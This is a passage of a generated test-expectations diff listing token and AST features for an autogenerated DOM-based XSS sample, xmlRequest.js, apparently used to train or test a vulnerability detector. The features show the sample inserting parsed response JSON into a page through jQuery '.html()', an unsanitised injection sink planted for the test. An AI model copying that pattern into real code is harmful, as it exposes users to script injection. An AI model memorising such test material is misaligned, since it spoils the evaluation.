JSON.pa ... seText) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:47 | JSON.pa ... seText) | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:47 | JSON.pa ... seText) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:47 | JSON.pa ... seText) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:47 | exceptional return of JSON.pa ... seText) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:47 | exceptional return of JSON.pa ... seText) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:47 | exceptional return of JSON.pa ... seText) | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:47 | exceptional return of JSON.pa ... seText) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:47 | exceptional return of JSON.pa ... seText) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:25:8:29 | parse | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:25:8:29 | parse | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:25:8:29 | parse | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:25:8:29 | parse | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:25:8:29 | parse | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:31:8:33 | xhr | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:31:8:33 | xhr | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:31:8:33 | xhr | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:31:8:33 | xhr | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:31:8:33 | xhr | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:8:31:8:46 | xhr.responseText | CalleeFlexibleAccessPath | JSON.parse | | autogenerated/Xss/DomBasedXss/xmlRequest.js:8:31:8:46 | xhr.responseText | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:8:31:8:46 | xhr.responseText | contextFunctionInterfaces | onreadystatechange() | @@ -18591,6 +126580,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/xmlRequest.js:8:31:8:46 | xhr.responseText | enclosingFunctionName | ready#functionalargument | | autogenerated/Xss/DomBasedXss/xmlRequest.js:8:31:8:46 | xhr.responseText | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:8:31:8:46 | xhr.responseText | receiverName | JSON | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:35:8:46 | responseText | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:35:8:46 | responseText | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:35:8:46 | responseText | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:35:8:46 | responseText | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:35:8:46 | responseText | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:9 | $ | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:9 | $ | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:9 | $ | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:9 | $ | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:9 | $ | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:21 | $("#myThing") | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:21 | $("#myThing") | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:21 | $("#myThing") | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:21 | $("#myThing") | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:21 | $("#myThing") | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:21 | exceptional return of $("#myThing") | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:21 | exceptional return of $("#myThing") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:21 | exceptional return of $("#myThing") | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:21 | exceptional return of $("#myThing") | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:21 | exceptional return of $("#myThing") | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:26 | $("#myThing").html | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:26 | $("#myThing").html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:26 | $("#myThing").html | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:26 | $("#myThing").html | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:26 | $("#myThing").html | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:40 | $("#myT ... essage) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:40 | $("#myT ... essage) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:40 | $("#myT ... essage) | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:40 | $("#myT ... essage) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:40 | $("#myT ... essage) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:40 | exceptional return of $("#myT ... essage) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:40 | exceptional return of $("#myT ... essage) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:40 | exceptional return of $("#myT ... essage) | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:40 | exceptional return of $("#myT ... essage) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:9:9:40 | exceptional return of $("#myT ... essage) | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:9:11:9:20 | "#myThing" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/xmlRequest.js:9:11:9:20 | "#myThing" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:9:11:9:20 | "#myThing" | contextFunctionInterfaces | onreadystatechange() | @@ -18598,6 +126622,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/xmlRequest.js:9:11:9:20 | "#myThing" | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | | autogenerated/Xss/DomBasedXss/xmlRequest.js:9:11:9:20 | "#myThing" | enclosingFunctionName | ready#functionalargument | | autogenerated/Xss/DomBasedXss/xmlRequest.js:9:11:9:20 | "#myThing" | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:23:9:26 | html | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:23:9:26 | html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:23:9:26 | html | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:23:9:26 | html | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:23:9:26 | html | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:28:9:31 | json | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:28:9:31 | json | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:28:9:31 | json | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:28:9:31 | json | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:28:9:31 | json | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:9:28:9:39 | json.message | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/xmlRequest.js:9:28:9:39 | json.message | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:9:28:9:39 | json.message | contextFunctionInterfaces | onreadystatechange() | @@ -18605,6 +126639,71 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/xmlRequest.js:9:28:9:39 | json.message | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | | autogenerated/Xss/DomBasedXss/xmlRequest.js:9:28:9:39 | json.message | enclosingFunctionName | ready#functionalargument | | autogenerated/Xss/DomBasedXss/xmlRequest.js:9:28:9:39 | json.message | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:33:9:39 | message | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:33:9:39 | message | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:33:9:39 | message | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:33:9:39 | message | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:9:33:9:39 | message | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:11 | xhr | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:11 | xhr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:11 | xhr | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:11 | xhr | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:11 | xhr | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:16 | xhr.send | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:16 | xhr.send | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:16 | xhr.send | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:16 | xhr.send | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:16 | xhr.send | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:18 | exceptional return of xhr.send() | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:18 | exceptional return of xhr.send() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:18 | exceptional return of xhr.send() | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:18 | exceptional return of xhr.send() | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:18 | exceptional return of xhr.send() | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:18 | xhr.send() | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:18 | xhr.send() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:18 | xhr.send() | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:18 | xhr.send() | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:9:12:18 | xhr.send() | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:13:12:16 | send | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:13:12:16 | send | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:13:12:16 | send | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:13:12:16 | send | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:12:13:12:16 | send | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:13:14:13:18 | error | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:13:14:13:18 | error | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:13:14:13:18 | error | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:13:14:13:18 | error | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:13:14:13:18 | error | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:13:14:13:18 | error | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:13:14:13:18 | error | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:13:14:13:18 | error | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:13:14:13:18 | error | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:13:14:13:18 | error | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:15 | console | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:15 | console | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:15 | console | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:15 | console | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:15 | console | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:19 | console.log | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:19 | console.log | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:19 | console.log | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:19 | console.log | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:19 | console.log | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:26 | console.log(error) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:26 | console.log(error) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:26 | console.log(error) | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:26 | console.log(error) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:26 | console.log(error) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:26 | exceptional return of console.log(error) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:26 | exceptional return of console.log(error) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:26 | exceptional return of console.log(error) | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:26 | exceptional return of console.log(error) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:9:14:26 | exceptional return of console.log(error) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:17:14:19 | log | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:17:14:19 | log | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:17:14:19 | log | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:17:14:19 | log | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:14:17:14:19 | log | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:14:21:14:25 | error | CalleeFlexibleAccessPath | console.log | | autogenerated/Xss/DomBasedXss/xmlRequest.js:14:21:14:25 | error | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:14:21:14:25 | error | contextFunctionInterfaces | onreadystatechange() | @@ -18613,16 +126712,87 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/xmlRequest.js:14:21:14:25 | error | enclosingFunctionName | ready#functionalargument | | autogenerated/Xss/DomBasedXss/xmlRequest.js:14:21:14:25 | error | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:14:21:14:25 | error | receiverName | console | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:18:1 | $ | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:18:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:18:1 | $ | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:18:11 | $(document) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:18:11 | $(document) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:18:11 | $(document) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:18:11 | exceptional return of $(document) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:18:11 | exceptional return of $(document) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:18:11 | exceptional return of $(document) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:18:17 | $(document).ready | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:18:17 | $(document).ready | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:18:17 | $(document).ready | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:24:2 | $(docum ... ces\\n\\n}) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:24:2 | $(docum ... ces\\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:24:2 | $(docum ... ces\\n\\n}) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:24:2 | exceptional return of $(docum ... ces\\n\\n}) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:24:2 | exceptional return of $(docum ... ces\\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:1:24:2 | exceptional return of $(docum ... ces\\n\\n}) | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:18:3:18:10 | document | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/xmlRequest.js:18:3:18:10 | document | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:18:3:18:10 | document | contextFunctionInterfaces | onreadystatechange() | | autogenerated/Xss/DomBasedXss/xmlRequest.js:18:3:18:10 | document | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/xmlRequest.js:18:3:18:10 | document | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:13:18:17 | ready | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:13:18:17 | ready | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:13:18:17 | ready | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:18:18 | this | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:18:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:18:18 | this | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:18:18 | this | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:18:18 | this | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | 'arguments' object of anonymous function | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | 'arguments' object of anonymous function | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | 'arguments' object of anonymous function | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | async f ... rces\\n\\n} | CalleeFlexibleAccessPath | $().ready | | autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | async f ... rces\\n\\n} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | async f ... rces\\n\\n} | contextFunctionInterfaces | onreadystatechange() | | autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | async f ... rces\\n\\n} | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | async f ... rces\\n\\n} | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | exceptional return of anonymous function | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | exceptional return of anonymous function | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | exceptional return of anonymous function | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | exceptional return of anonymous function | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | return of anonymous function | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | return of anonymous function | enclosingFunctionBody | got require got resp got get {{ some_url }} 